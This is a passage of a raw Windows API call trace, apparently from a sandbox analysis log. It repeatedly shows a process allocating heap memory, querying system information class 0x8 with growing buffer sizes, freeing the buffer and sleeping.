RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.038] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.038] Sleep (dwMilliseconds=0x110) [0212.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.054] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.054] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.055] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.055] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.055] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.055] Sleep (dwMilliseconds=0x110) [0212.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.083] Sleep (dwMilliseconds=0x110) [0212.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.099] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.100] Sleep (dwMilliseconds=0x110) [0212.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.125] Sleep (dwMilliseconds=0x110) [0212.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.145] Sleep (dwMilliseconds=0x110) [0212.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.161] Sleep (dwMilliseconds=0x110) [0212.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.221] Sleep (dwMilliseconds=0x110) [0212.338] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.396] Sleep (dwMilliseconds=0x110) [0212.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.459] Sleep (dwMilliseconds=0x110) [0212.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.500] Sleep (dwMilliseconds=0x110) [0212.512] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.520] Sleep (dwMilliseconds=0x110) [0212.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.537] Sleep (dwMilliseconds=0x110) [0212.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.598] Sleep (dwMilliseconds=0x110) [0212.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 